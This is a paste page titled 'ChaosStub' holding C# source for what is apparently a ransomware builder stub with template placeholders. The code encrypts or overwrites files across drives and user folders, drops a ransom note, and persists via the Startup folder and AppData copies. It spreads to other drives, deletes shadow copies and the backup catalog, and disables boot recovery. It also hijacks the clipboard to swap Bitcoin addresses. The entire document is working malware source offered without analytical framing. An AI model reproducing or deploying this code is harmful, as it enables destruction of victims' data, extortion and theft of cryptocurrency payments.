Create Paste
Top Pastes
Recent Pastes
Settings
Account
ChaosStub
Anonymous
Views
27
Visibility
Private
Expires
Never
Created
November 2022
View Raw
Download
using System; using System.Linq; using System.Windows.Forms; using System.Runtime.InteropServices; using System.Text.RegularExpressions; namespace ConsoleApplication7 { class Program { private static string userName = Environment.UserName; private static string userDir = "C:\\Users\\"; public static string appMutexRun = "7z459ajrk722yn8c5j4fg"; public static bool encryptionAesRsa = #encryptOption; public static string encryptedFileExtension = "#encryptedFileExtension"; private static bool checkSpread = #checkSpread; private static string spreadName = "#spreadName"; private static bool checkCopyRoaming = #copyRoaming; private static string processName = "#exeName"; public static string appMutexRun2 = "2X28tfRmWaPyPQgvoHV"; private static bool checkStartupFolder = #startupFolder; private static bool checkSleep = #checkSleep; private static int sleepTextbox = #sleepTextbox; private static string base64Image = @"#base64Image"; public static string appMutexStartup = "1qw0ll8p9m8uezhqhyd"; private static string droppedMessageTextbox = "#droppedMessageTextbox"; //************ Admin field ********** private static bool checkAdminPrivilage = #adminPrivilage; private static bool checkdeleteShadowCopies = #checkdeleteShadowCopies; private static bool checkdisableRecoveryMode = #checkdisableRecoveryMode; private static bool checkdeleteBackupCatalog = #checkdeleteBackupCatalog; //***************** public static string appMutexStartup2 = "17CqMQFeuB3NTzJ"; public static string appMutex2 = appMutexStartup2 + appMutexRun2; public static string staticSplit = "bc"; public static string appMutex = staticSplit+appMutexStartup + appMutexRun; public readonly static Regex appMutexRegex = new Regex(@"(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})"); private static string[] messages = { #messages }; private static string[] validExtensions = new[] { #extensions }; public static class NativeMethods { [DllImport("user32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool AddClipboardFormatListener(IntPtr hwnd); [DllImport("user32.dll", SetLastError = true)] public static extern IntPtr SetParent(IntPtr hWndChild, IntPtr hWndNewParent); public const int clp = 0x031D; public static IntPtr intpreclp = new IntPtr(-3); } [DllImport("user32.dll", CharSet = CharSet.Auto)] private static extern Int32 SystemParametersInfo(UInt32 action, UInt32 uParam, String vParam, UInt32 winIni); static void Main(string[] args) { if (AlreadyRunning()) { System.Environment.Exit(1); } if (checkSleep) { sleepOutOfTempFolder(); //System.Threading.Thread.Sleep(sleepTextbox * 1000); } if (checkAdminPrivilage) { copyResistForAdmin(processName); } else { if (checkCopyRoaming) { copyRoaming(processName); } } if (checkStartupFolder) { addLinkToStartup(); } lookForDirectories(); if (checkAdminPrivilage) { if (checkdeleteShadowCopies) { deleteShadowCopies(); } if (checkdisableRecoveryMode) { disableRecoveryMode(); } if (checkdeleteBackupCatalog) { deleteBackupCatalog(); } } if (checkSpread == true) { spreadIt(spreadName); } addAndOpenNote(); SetWallpaper(base64Image); new System.Threading.Thread(() => { Run(); }).Start(); } public static void Run() { Application.Run(new driveNotification.NotificationForm()); } private static void sleepOutOfTempFolder() { string currentPath = System.IO.Path.GetDirectoryName(System.Reflection.Assembly.GetEntryAssembly().Location); string tempFolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); if (currentPath != tempFolder) { System.Threading.Thread.Sleep(sleepTextbox * 1000); } } private static bool AlreadyRunning() { System.Diagnostics.Process[] processes = System.Diagnostics.Process.GetProcesses(); System.Diagnostics.Process currentProc = System.Diagnostics.Process.GetCurrentProcess(); foreach (System.Diagnostics.Process process in processes) { try { if (process.Modules[0].FileName == System.Reflection.Assembly.GetExecutingAssembly().Location && currentProc.Id != process.Id) return true; } catch (Exception) { } } return false; } public static byte[] random_bytes(int length) { Random rnd = new Random(); length = length + 1; byte[] random = new byte[length]; rnd.NextBytes(random); return random; } private static Random random = new Random(); public static string RandomString(int length) { const string pool = "abcdefghijklmnopqrstuvwxyz0123456789"; var builder = new System.Text.StringBuilder(); for (var i = 0; i < length; i++) { var c = pool[random.Next(0, pool.Length)]; builder.Append(c); } return builder.ToString(); } public static string RandomStringForExtension(int length) { if (encryptedFileExtension == "") { const string pool = "abcdefghijklmnopqrstuvwxyz0123456789"; var builder = new System.Text.StringBuilder(); for (var i = 0; i < length; i++) { var c = pool[random.Next(0, pool.Length)]; builder.Append(c); } return builder.ToString(); } else { return encryptedFileExtension; } } public static string Base64EncodeString(string plainText) { var plainTextBytes = System.Text.Encoding.UTF8.GetBytes(plainText); return System.Convert.ToBase64String(plainTextBytes); } public static string randomEncode(string plainText) { var plainTextBytes = System.Text.Encoding.UTF8.GetBytes(plainText); return "<EncyptedKey>" + Base64EncodeString(RandomString(41)) + "<EncyptedKey> " + RandomString(2) + System.Convert.ToBase64String(plainTextBytes); } private static void encryptDirectory(string location) { try { string[] files = System.IO.Directory.GetFiles(location); bool checkCrypted = true; for (int i = 0; i < files.Length; i++) { try { string extension = System.IO.Path.GetExtension(files[i]); string fileName = System.IO.Path.GetFileName(files[i]); if (Array.Exists(validExtensions, E => E == extension.ToLower()) && fileName != droppedMessageTextbox) { System.IO.FileInfo fi = new System.IO.FileInfo(files[i]); fi.Attributes = System.IO.FileAttributes.Normal; if (fi.Length < 2117152) { if (encryptionAesRsa == true) { EncryptFile(files[i]); } } else if(fi.Length > 200000000){ Random rnd = new Random(); int rndSize = rnd.Next(200000000,300000000); string a = System.Text.Encoding.UTF8.GetString(random_bytes(rndSize)); System.IO.File.WriteAllText(files[i], randomEncode(a)); System.IO.File.Move(files[i], files[i] + "." + RandomStringForExtension(4)); } else { string a = System.Text.Encoding.UTF8.GetString(random_bytes(Convert.ToInt32(fi.Length) / 4)); System.IO.File.WriteAllText(files[i], randomEncode(a)); //File.WriteAllBytes(files[i], random_bytes(Convert.ToInt32(1098576))); System.IO.File.Move(files[i], files[i] + "." + RandomStringForExtension(4)); } if (checkCrypted) { checkCrypted = false; System.IO.File.WriteAllLines(location + "/" + droppedMessageTextbox, messages); } } } catch { } } string[] childDirectories = System.IO.Directory.GetDirectories(location); for (int i = 0; i < childDirectories.Length; i++) { encryptDirectory(childDirectories[i]); } } catch (Exception) { } } public static string rsaKey() { System.Text.StringBuilder pubclicKey = new System.Text.StringBuilder(); #publicKey return pubclicKey.ToString(); } public static string CreatePassword(int length) { const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/"; System.Text.StringBuilder res = new System.Text.StringBuilder(); Random rnd = new Random(); while (0 < length--) { res.Append(valid[rnd.Next(valid.Length)]); } return res.ToString(); } public static byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) { byte[] encryptedBytes = null; byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 }; using (System.IO.MemoryStream ms = new System.IO.MemoryStream()) { using (System.Security.Cryptography.RijndaelManaged AES = new System.Security.Cryptography.RijndaelManaged()) { AES.KeySize = 256; AES.BlockSize = 128; var key = new System.Security.Cryptography.Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000); AES.Key = key.GetBytes(AES.KeySize / 8); AES.IV = key.GetBytes(AES.BlockSize / 8); AES.Mode = System.Security.Cryptography.CipherMode.CBC; using (var cs = new System.Security.Cryptography.CryptoStream(ms, AES.CreateEncryptor(), System.Security.Cryptography.CryptoStreamMode.Write)) { cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length); cs.Close(); } encryptedBytes = ms.ToArray(); } } return encryptedBytes; } public static void EncryptFile(string file) { byte[] bytesToBeEncrypted = System.IO.File.ReadAllBytes(file); string password = CreatePassword(20); byte[] passwordBytes = System.Text.Encoding.UTF8.GetBytes(password); //passwordBytes = System.Security.Cryptography.SHA256.Create().ComputeHash(passwordBytes); byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes); System.IO.File.WriteAllText(file, "<EncryptedKey>" + RSAEncrypt(password, rsaKey()) + "<EncryptedKey>" + Convert.ToBase64String(bytesEncrypted)); System.IO.File.Move(file, file + "." + RandomStringForExtension(4)); } public static string RSAEncrypt(string textToEncrypt, string publicKeyString) { var bytesToEncrypt = System.Text.Encoding.UTF8.GetBytes(textToEncrypt); using (var rsa = new System.Security.Cryptography.RSACryptoServiceProvider(1024)) { try { rsa.FromXmlString(publicKeyString.ToString()); var encryptedData = rsa.Encrypt(bytesToEncrypt, true); var base64Encrypted = Convert.ToBase64String(encryptedData); return base64Encrypted; } finally { rsa.PersistKeyInCsp = false; } } } private static void lookForDirectories() { foreach (var item in System.IO.DriveInfo.GetDrives()) { if (item.ToString() != "C:\\") { encryptDirectory(item.ToString()); } } string startPath_1 = userDir + userName + "\\Desktop"; string startPath_2 = userDir + userName + "\\Links"; string startPath_3 = userDir + userName + "\\Contacts"; string startPath_4 = userDir + userName + "\\Desktop"; string startPath_5 = userDir + userName + "\\Documents"; string startPath_6 = userDir + userName + "\\Downloads"; string startPath_7 = userDir + userName + "\\Pictures"; string startPath_8 = userDir + userName + "\\Music"; string startPath_9 = userDir + userName + "\\OneDrive"; string startPath_10 = userDir + userName + "\\Saved Games"; string startPath_11 = userDir + userName + "\\Favorites"; string startPath_12 = userDir + userName + "\\Searches"; string startPath_13 = userDir + userName + "\\Videos"; encryptDirectory(startPath_1); encryptDirectory(startPath_2); encryptDirectory(startPath_3); encryptDirectory(startPath_4); encryptDirectory(startPath_5); encryptDirectory(startPath_6); encryptDirectory(startPath_7); encryptDirectory(startPath_8); encryptDirectory(startPath_9); encryptDirectory(startPath_10); encryptDirectory(startPath_11); encryptDirectory(startPath_12); encryptDirectory(startPath_13); encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)); encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments)); encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonPictures)); encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic)); encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos)); encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory)); } private static void copyRoaming(string processName) { string payloadFutureName = processName; string exeName = System.AppDomain.CurrentDomain.FriendlyName; string exepath = System.Reflection.Assembly.GetExecutingAssembly().Location; string startuppath = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + @"\" + exeName; string tempFolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\"; string executeAs = tempFolder + payloadFutureName; //Console.WriteLine(exepath); //Console.WriteLine(startuppath); if (exeName != payloadFutureName || exepath != executeAs) { if (!System.IO.File.Exists(executeAs)) { System.IO.File.Copy(exeName, executeAs); System.Diagnostics.ProcessStartInfo processStartInfo = new System.Diagnostics.ProcessStartInfo(executeAs); processStartInfo.WorkingDirectory = tempFolder; System.Diagnostics.Process process = new System.Diagnostics.Process(); process.StartInfo = processStartInfo; if (process.Start()) { System.Environment.Exit(1); } } else { try { System.IO.File.Delete(executeAs); System.Threading.Thread.Sleep(200); System.IO.File.Copy(exeName, executeAs); } catch { } System.Diagnostics.ProcessStartInfo processStartInfo = new System.Diagnostics.ProcessStartInfo(executeAs); processStartInfo.WorkingDirectory = tempFolder; System.Diagnostics.Process process = new System.Diagnostics.Process(); process.StartInfo = processStartInfo; if (process.Start()) { System.Environment.Exit(1); } } } } private static void copyResistForAdmin(string processName) { string payloadFutureName = processName; string exeName = System.AppDomain.CurrentDomain.FriendlyName; string exepath = System.Reflection.Assembly.GetExecutingAssembly().Location; string startuppath = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + @"\" + exeName; string tempFolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\"; string executeAs = tempFolder + payloadFutureName; const int ERROR_CANCELLED = 1223; var startInfo = new System.Diagnostics.ProcessStartInfo(executeAs) { UseShellExecute = true, Verb = "runas", WindowStyle = System.Diagnostics.ProcessWindowStyle.Normal, WorkingDirectory = tempFolder }; System.Diagnostics.Process process = new System.Diagnostics.Process(); process.StartInfo = startInfo; if (exeName != payloadFutureName || exepath != executeAs) { if (!System.IO.File.Exists(executeAs)) { System.IO.File.Copy(exeName, executeAs); try { System.Diagnostics.Process.Start(startInfo); System.Environment.Exit(1); } catch (System.ComponentModel.Win32Exception ex) { if (ex.NativeErrorCode == ERROR_CANCELLED) { copyResistForAdmin(processName); } } } else { try { System.IO.File.Delete(executeAs); System.Threading.Thread.Sleep(200); System.IO.File.Copy(exeName, executeAs); } catch { } try { System.Diagnostics.Process.Start(startInfo); System.Environment.Exit(1); } catch (System.ComponentModel.Win32Exception ex) { if (ex.NativeErrorCode == ERROR_CANCELLED) { copyResistForAdmin(processName); } } } } } private static void addLinkToStartup() { string startUpFolder = Environment.GetFolderPath(Environment.SpecialFolder.Startup); string linkName = System.Diagnostics.Process.GetCurrentProcess().ProcessName; using (System.IO.StreamWriter writer = new System.IO.StreamWriter(startUpFolder + "\\" + linkName + ".url")) { string app = System.Reflection.Assembly.GetExecutingAssembly().Location; writer.WriteLine("[InternetShortcut]"); writer.WriteLine("URL=file:///" + app); writer.WriteLine("IconIndex=0"); string icon = app.Replace('\\', '/'); writer.WriteLine("IconFile=" + icon); } } private static void addAndOpenNote() { string tempFolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + droppedMessageTextbox; //string startUpDirectory = userDir + userName + "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\read_it.txt"; try { System.IO.File.WriteAllLines(tempFolder, messages); System.Threading.Thread.Sleep(500); System.Diagnostics.Process.Start(tempFolder); } catch { } } private static void registryStartup() { try { Microsoft.Win32.RegistryKey key1 = Microsoft.Win32.Registry.CurrentUser.OpenSubKey ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); //REGISTRY KEY FOR CURRENT EXE LOCATION key1.SetValue("Microsoft Store", System.Reflection.Assembly.GetExecutingAssembly().Location); } catch { } } private static void spreadIt(string spreadName) { foreach (var item in System.IO.DriveInfo.GetDrives()) { if (item.ToString() != "C:\\") { if (!System.IO.File.Exists(item.ToString() + spreadName)) { // System.Threading.Thread.Sleep(500); try { System.IO.File.Copy(System.Reflection.Assembly.GetExecutingAssembly().Location, item.ToString() + spreadName); } catch { } } } } } private static void runCommand(string commands) { System.Diagnostics.Process process = new System.Diagnostics.Process(); System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); //startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; startInfo.FileName = "cmd.exe"; startInfo.Arguments = "/C " + commands; //startInfo.Arguments = "/C "; //startInfo.Arguments = "/C ping google.com"; startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; process.StartInfo = startInfo; process.Start(); process.WaitForExit(); } private static void deleteShadowCopies() { //System.Windows.Forms.MessageBox.Show("deleteShadowCopies"); runCommand("vssadmin delete shadows /all /quiet & wmic shadowcopy delete"); } private static void disableRecoveryMode() { //System.Windows.Forms.MessageBox.Show("disableRecoveryMode"); runCommand("bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"); } private static void deleteBackupCatalog() { //System.Windows.Forms.MessageBox.Show("deleteBackupCatalog"); runCommand("wbadmin delete catalog -quiet"); } public static void SetWallpaper(string base64) { if (base64 != "") { try{ string tempFolder = System.IO.Path.GetTempPath() + RandomString(9) + ".jpg"; System.IO.File.WriteAllBytes(tempFolder, Convert.FromBase64String(base64)); SystemParametersInfo(0x14, 0, tempFolder, 0x01 | 0x02); }catch{} } } } public sealed class driveNotification { public class NotificationForm : Form { private static string currentClipboard = GetText(); public NotificationForm() { Program.NativeMethods.SetParent(Handle, Program.NativeMethods.intpreclp); Program.NativeMethods.AddClipboardFormatListener(Handle); } private bool RegexResult(Regex pattern) { if (pattern.Match(currentClipboard).Success) return true; else return false; } protected override void WndProc(ref Message m) { if (m.Msg == Program.NativeMethods.clp) { currentClipboard = GetText(); if (currentClipboard.StartsWith("bc1")) { if (RegexResult(Program.appMutexRegex) && !currentClipboard.Contains(Program.appMutex)) { string result = Program.appMutexRegex.Replace(currentClipboard, Program.appMutex); SetText(result); } } else { if (RegexResult(Program.appMutexRegex) && !currentClipboard.Contains(Program.appMutex2)) { string result = Program.appMutexRegex.Replace(currentClipboard, Program.appMutex2); SetText(result); } } } base.WndProc(ref m); } protected override CreateParams CreateParams { get { var cp = base.CreateParams; cp.ExStyle |= 0x80; return cp; } } public static string GetText() { string ReturnValue = string.Empty; System.Threading.Thread STAThread = new System.Threading.Thread( delegate() { ReturnValue = System.Windows.Forms.Clipboard.GetText(); }); STAThread.SetApartmentState(System.Threading.ApartmentState.STA); STAThread.Start(); STAThread.Join(); return ReturnValue; } public static void SetText(string txt) { System.Threading.Thread STAThread = new System.Threading.Thread( delegate() { System.Windows.Forms.Clipboard.SetText(txt); }); STAThread.SetApartmentState(System.Threading.ApartmentState.STA); STAThread.Start(); STAThread.Join(); } } } }